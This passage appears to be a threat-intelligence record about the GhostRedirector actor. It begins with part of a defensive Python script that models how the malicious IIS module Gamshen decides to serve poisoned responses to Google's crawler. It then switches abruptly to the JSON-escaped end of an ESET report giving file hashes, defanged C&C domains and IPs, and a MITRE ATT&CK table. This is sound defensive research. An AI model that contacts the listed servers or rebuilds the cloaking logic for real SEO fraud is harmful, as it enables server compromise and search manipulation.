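    '''First check: Googlebot in the User-Agent, or google.com in the Referer.'''
    return 'Googlebot' in headers.get('User-Agent', '') or 'google.com' in headers.get('Referer', '')


def is_static(path):
    '''Third check: images, stylesheets and scripts are left alone.'''
    return path.lower().endswith(STATIC_EXTS)


def url_targeted(path):
    '''Fourth check: literal android_ anywhere, or any of the eight patterns (unanchored search assumed).'''
    return 'android_' in path or any(p.search(path) for p in URL_PATTERNS)


def would_poison(method, path, headers):
    '''True when a request passes every check and Gamshen would replace the response.'''
    return (is_crawler(headers)
            and method.upper() != 'POST'
            and not is_static(path)
            and url_targeted(path))


def classify(requests):
    return [would_poison(m, p, h) for m, p, h in requests]


GOOGLEBOT = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
BROWSER = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0'
# Constructed requests (method, path, headers); none of these are taken from the report.
SAMPLE_REQUESTS = [
    ('GET', '/android_123456', {'User-Agent': GOOGLEBOT}),       # attacker-style path, crawler
    ('GET', '/android_123456', {'User-Agent': BROWSER}),         # same path, ordinary browser
    ('POST', '/android_123456', {'User-Agent': GOOGLEBOT}),      # POST is excluded
    ('GET', '/android_123456.jpg', {'User-Agent': GOOGLEBOT}),   # static extension is excluded
    ('GET', '/plays/abcdefghij', {'User-Agent': BROWSER, 'Referer': 'https://www.google.com/search?q=x'}),
    ('GET', '/company/careers/', {'User-Agent': GOOGLEBOT}),     # ordinary path that still matches pattern 5
    ('GET', '/about', {'User-Agent': GOOGLEBOT}),                # crawler, but no pattern matches
]

if __name__ == '__main__':
    for (method, path, headers), hit in zip(SAMPLE_REQUESTS, classify(SAMPLE_REQUESTS)):
        print('POISONED ' if hit else 'untouched', method, path)
```

The sixth sample shows that the fifth pattern also matches ordinary two-segment paths with a trailing slash, and the fifth sample shows a browser arriving from a Google result passing the crawler check; a site review should therefore fetch real pages with a Googlebot User-Agent, not only attacker-style android_ paths.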
A base64-encoded response is expected, which is then decoded and injected into the HTTP response intended for the search engine crawler.\r\nFinally, at the last step of the request processing pipeline, just before the HTTP response is sent out, the OnSendResponse event handler inspects the response to these crawler requests. If the response has the 404 HTTP status code, i.e., Gamshen was not able to obtain the malicious data from its C\u0026C server, it instead redirects the crawler to a different C\u0026C server: http://gobr.868id[.]com/tz.php.\r\nWe weren’t able to obtain a response from brproxy.868id[.]com or gobr.868id[.]com, but believe the data supports shady SEO techniques such as keyword stuffing and inserting malicious backlinks, or, in the case of the redirection, making the search engine associate the compromised website with the target, third-party website, thus poisoning the search index.\r\nWe were, however, able to pivot on those domains on VirusTotal and find related images; in this case, images advertising a gambling application for Portuguese-speaking users. We believe this website is the beneficiary of the SEO fraud scheme facilitated by this malicious IIS module; GhostRedirector probably attempts to compromise as many websites as possible and misuse their reputation to drive traffic to this third-party website.\r\nFigure 8 and Figure 9 show two images potentially used by GhostRedirector in its SEO fraud scheme.\r\nFigure 8. A gambling website likely benefiting from the SEO fraud scheme (machine translation: Benefits and privileges for VIP members)\r\nFigure 9. 
A gambling website likely benefiting from the SEO fraud scheme (machine translation: Large deposits and withdrawals without worries)\r\nConclusion\r\nIn this blogpost, we have presented a previously unknown, China-aligned threat actor, GhostRedirector, and its toolkit for compromising and abusing Windows servers. In addition to enabling remote command execution on the compromised servers, GhostRedirector also deploys a malicious IIS module, Gamshen, designed to manipulate Google search results through shady SEO tactics. Gamshen abuses the credibility of the websites hosted on the compromised server to promote a third-party, gambling website, potentially a paying client participating in an SEO fraud as-a-service scheme.\r\nGhostRedirector also demonstrates persistence and operational resilience by deploying multiple remote access tools on the compromised server, on top of creating rogue user accounts, all to maintain long-term access to the compromised infrastructure.\r\nMitigation recommendations can be found in our comprehensive white paper. 
For any inquiries, or to make sample submissions related to the subject, contact us at threatintel@eset.com.\r\nIoCs\r\nA comprehensive list of indicators of compromise (IoCs) and samples can be found in our GitHub repository.\r\nFiles\r\nSHA-1 | Filename | Detection | Description\r\nEE22BA5453ED577F8664CA390EB311D067E47786 | SitePut.exe | MSIL/Agent.FEZ | Zunput, information collector and webshell installer.\r\n677B3F9D780BE184528DE5967936693584D9769A | EfsNetAutoUser.exe | MSIL/HackTool.Agent.QJ | A custom tool using the EfsPotato exploit to create a new user on the compromised server.\r\n5D4D7C96A9E302053BDFAF2449F9A2AB3C806E63 | NetAutoUser.exe | MSIL/AddUser.S | A custom tool using the BadPotato exploit to create a new user on the compromised server.\r\n28140A5A29EBA098BC6215DDAC8E56EACBB29B69 | miniscreen.dll | Win64/Agent.ELA | Rungan, a passive C++ backdoor.\r\n371818BDC20669DF3CA44BE758200872D583A3B8 | auto.exe | Generik.KJWBIPC | A tool to create a new user on the compromised server.\r\n9DD282184DDFA796204C1D90A46CAA117F46C8E1 | auto_sign.exe | MSIL/Agent.XQL | A tool to create a new user or deploy webshells on the compromised server.\r\n87F354EAA1A6ED5AE51C4B1A1A801B6CF818DAFC | EfsNetAutoUser.exe | MSIL/HackTool.Agent.QJ | A custom tool using the EfsPotato exploit to create a new user on the compromised server.\r\n5A01981D3F31AF47614E51E6C216BED70D921D60 | DotNet4.5.exe | MSIL/AddUser.S | Custom tool using the BadPotato exploit to elevate the privileges of an existing user.\r\n6EBD7498FC3B744CED371C379BA537077DD97036 | NetAUtoUser_sign.exe | MSIL/AddUser.S | Custom tool using the BadPotato exploit to elevate the privileges of an existing 
user.\r\n0EE926E29874324E52DE816B74B12069529BB556 | link.exe | Win64/RemoteAdmin.GotoHTTP (potentially unsafe application) | GoToHTTP tool.\r\n373BD3CED51E19E88876B80225ECA65A5C01413F | N/A | PHP/Webshell.NWE | Webshell.\r\n5CFFC4B3B96256A45FB45056AE0A9DC76329C25A | N/A | ASP/Webshell.MP | Webshell.\r\nB017CEE02D74C92B2C65517101DC72AFA7D18F16 | N/A | PHP/Webshell.OHB | Webshell.\r\nA8EE056799BFEB709C08D0E41D9511CED5B1F19D | N/A | ASP/Webshell.UV | Webshell.\r\nC4681F768622BD613CBF46B218CDA06F87559825 | N/A | ASP/Webshell.KU | Webshell.\r\nE69E4E5822A81F68107B933B7653C487D055C51B | N/A | ASP/Webshell.UZ | Webshell.\r\nA3A55E4C1373E8287E4E4D5D3350AC665E1411A7 | N/A | ASP/Webshell.UY | Webshell.\r\nE6E4634CE5AFDA0688E73A2C21A2ECDABD5E155D | N/A | ASP/Webshell.UY | Webshell.\r\n5DFC2D0858DD7E811CD19938B8C28468BE494CB6 | N/A | ASP/Webshell.UX | Webshell.\r\n08AB5CC8618FA593D2DF91900067DB464DC72B3E | ManagedEngine32_v2.dll | Win32/BadIIS.AG | Gamshen, a malicious IIS module.\r\n871A4DF66A8BAC3E640B2D1C0AFC075BB3761954 | ManagedEngine64_v2.dll | Win64/BadIIS.CY | Gamshen, a malicious IIS module.\r\n049C343A9DAAF3A93756562ED73375082192F5A8 | N/A | MSIL/Agent.FFZ | Comdai, a malicious multipurpose DLL used to create a malicious user.\r\nNetwork\r\nIP | Domain | Hosting provider | First seen | Details\r\nN/A | xzs.868id[.]com | N/A | 2024‑12‑03 | GhostRedirector staging server, hosted on Cloudflare.\r\n104.233.192[.]1 | xz.868id[.]com | PEG TECH INC | 2024‑12‑03 | GhostRedirector 
staging\r\nserver.\r\n104.233.210[.]229\r\nq.822th[.]com\r\nwww.881vn[.]com\r\nPEG TECH INC 2023‑10‑06\r\nGhostRedirector staging\r\nserver.\r\nN/A gobr.868id[.]com N/A 2024‑08‑25\r\nGamshen C\u0026C server,\r\nhosted on Cloudflare.\r\nN/A brproxy.868id[.]com N/A 2024‑08‑25\r\nGamshen C\u0026C server,\r\nhosted on Cloudflare.\r\n43.228.126[.]4 www.cs01[.]shop\r\nXIMBO Internet\r\nLimited\r\n2024‑04‑01 Comdai C\u0026C server.\r\n103.251.112[.]11 N/A IRT‑HK‑ANS N/A\r\nGhostRedirector staging\r\nserver.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 17 of the MITRE ATT\u0026CK framework.\r\nTactic ID Name Description\r\nResource\r\nDevelopment\r\nT1588.002 Obtain Capabilities: Tool\r\nGhostRedirector uses .NET Reactor to\r\nobfuscate its tools, and used EfsPotato and\r\nBadPotato to develop custom privilege\r\nescalation tools.\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nGhostRedirector develops its own\r\nmalware\r\nT1608.006\r\nStage Capabilities: SEO\r\nPoisoning\r\nGhostRedirector uses SEO poisoning to\r\nmanipulate search results and drive traffic\r\nto a third-party website.\r\nT1583.001\r\nAcquire Infrastructure:\r\nDomains\r\nGhostRedirector uses malicious domains\r\nfor hosting payloads and for its C\u0026C\r\nservers.\r\nT1583.004\r\nAcquire Infrastructure:\r\nServer\r\nGhostRedirector leverages Cloudflare on\r\nits infrastructure.\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 18 of 20\n\nTactic ID Name Description\r\nT1608.001\r\nStage Capabilities: Upload\r\nMalware\r\nGhostRedirector has staged Rungan and\r\nGamshen on attacker-controlled servers.\r\nT1608.002\r\nStage Capabilities: Upload\r\nTool\r\nGhostRedirector has staged various\r\nmalicious and legitimate tools on attacker-controlled servers.\r\nT1588.003\r\nObtain Capabilities: Code\r\nSigning Certificates\r\nGhostRedirector obtained a certificate for\r\nsigning its tools, like those for 
privilege\r\nescalation.\r\nInitial Access T1190\r\nExploit Public-Facing\r\nApplication\r\nGhostRedirector exploits an unknown\r\nSQL injection vulnerability on the victim’s\r\nserver.\r\nExecution\r\nT1106 Native API\r\nGhostRedirector may use APIs such as\r\nHttpInitialize and HttpAddUrl for\r\nregistering a URL.\r\nT1059.001\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nGhostRedirector uses PowerShell\r\ninterpreter to download malware.\r\nT1059.003\r\nCommand and Scripting\r\nInterpreter: Windows\r\nCommand Shell\r\nGhostRedirector can execute cmd.exe\r\ncommands to download malware.\r\nT1559\r\nInter-Process\r\nCommunication\r\nComdai can create a pipe to communicate\r\nand receive information from another\r\nprocess.\r\nPersistence T1546 Event Triggered Execution\r\nGamshen is loaded by the IIS Worker\r\nProcess (w3wp.exe) when the IIS server\r\nreceives an inbound HTTP request.\r\nPrivilege\r\nEscalation\r\nT1134 Access Token Manipulation\r\nGhostRedirector can manipulate tokens to\r\nperform a local privilege escalation.\r\nT1112 Modify Registry\r\nGhostRedirector can modify a Windows\r\nregistry key to perform RID hijacking.\r\nDefense\r\nEvasion T1027\r\nObfuscated Files or\r\nInformation\r\nGhostRedirector obfuscates its local\r\nprivilege escalation tools using .NET\r\nReactor.\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 19 of 20\n\nTactic ID Name Description\r\nT1027.009\r\nObfuscated Files or\r\nInformation: Embedded\r\nPayloads\r\nGhostRedirector embedded webshells into\r\nits payloads like Zunput to be dropped on\r\ncompromised server.\r\nT1140\r\nDeobfuscate/Decode Files or\r\nInformation\r\nGhostRedirector uses AES in CBC mode\r\nto decrypt strings in the backdoor Rungan.\r\nDiscovery T1083 File and Directory Discovery\r\nGhostRedirector can use Zunput to list\r\ndirectory content on a victim’s server.\r\nCommand and\r\nControl\r\nT1105 Ingress Tool 
Transfer\r\nGhostRedirector can abuse the tool\r\ncertutil.exe to download malware.\r\nT1219 Remote Access Software\r\nGhostRedirector may use the GoToHTTP\r\ntool for connecting remotely to victims.\r\nT1071.001\r\nApplication Layer Protocol:\r\nWeb Protocols\r\nGhostRedirector relies on HTTP to\r\ncommunicate with the backdoor Rungan.\r\nT1008 Fallback Channels\r\nGhostRedirector can deploy the tool\r\nGoToHTTP or create malicious users on\r\nthe compromised server to maintain\r\naccess.\r\nImpact T1565 Data Manipulation\r\nGhostRedirector can modify the response\r\nof a compromised server intended for the\r\nGoogle crawler, in attempts to influence\r\nsearch results order.\r\nSource: https://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/"
	],
	"report_names": [
		"ghostredirector-poisons-windows-servers-backdoors-side-potatoes"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "0e62ad61-c51d-460e-a587-b11d17bb2fb3",
			"created_at": "2024-10-04T02:00:04.754794Z",
			"updated_at": "2026-04-10T02:00:03.712878Z",
			"deleted_at": null,
			"main_name": "DragonRank",
			"aliases": [],
			"source_name": "MISPGALAXY:DragonRank",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9a008ebb-676f-4c3b-9e25-e19305d1b5d7",
			"created_at": "2026-01-23T02:00:03.286173Z",
			"updated_at": "2026-04-10T02:00:03.928041Z",
			"deleted_at": null,
			"main_name": "GhostRedirector",
			"aliases": [],
			"source_name": "MISPGALAXY:GhostRedirector",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434250,
	"ts_updated_at": 1775826741,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6890f97b76084593958ddc4b04bd15e6091e864e.pdf",
		"text": "https://archive.orkl.eu/6890f97b76084593958ddc4b04bd15e6091e864e.txt",
		"img": "https://archive.orkl.eu/6890f97b76084593958ddc4b04bd15e6091e864e.jpg"
	}
}